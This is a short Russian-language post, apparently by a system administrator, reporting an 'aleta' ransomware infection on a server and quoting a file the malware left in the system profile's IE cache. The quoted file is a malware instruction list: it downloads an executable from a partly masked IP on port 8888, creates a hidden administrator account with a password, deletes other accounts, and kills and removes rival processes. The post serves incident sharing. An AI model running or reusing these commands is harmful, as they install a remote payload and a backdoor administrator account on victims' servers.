информация по шифровальщику aleta

[virus_alert 0]

На одном из серверов, где не было антивируса, сработал шифровальщик aleta. Все данные в итоге удалось восстановить.

Из интересного был найден файл ok[1].txt в системном профиле C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5

Ниже его содержимое, могу предположить, что это ip-адрес командного сервера злоумышленников.

 

[down]

h__p://118.xxx.xxx.141:8888/ppsa.jpg c:\windows\Loginsas.exe 1

[cmd]

net1 user IUSR_Servs ZxcvBMN,.1987&net1 user IUSR_Servs ZxcvBMN,.1987 /ad&net1 localgroup administrators IUSR_Servs /ad

net1 user IISUSER_ACCOUNTXX /del&net1 user IUSR_ADMIN /del&net1 user snt0454 /del&taskkill /f /im Logo1_.exe&del c:\windows\Logo1_.exe

del c:\windows\RichDllt.dll

taskkill /f /im netcore.exe&del c:\windows\netcore.exe&taskkill /f /im ygwmgo.exe&del c:\windows\ygwmgo.exe&net1 user aspnet /del&net1 user LOCAL_USER /del

echo 123>>1.txt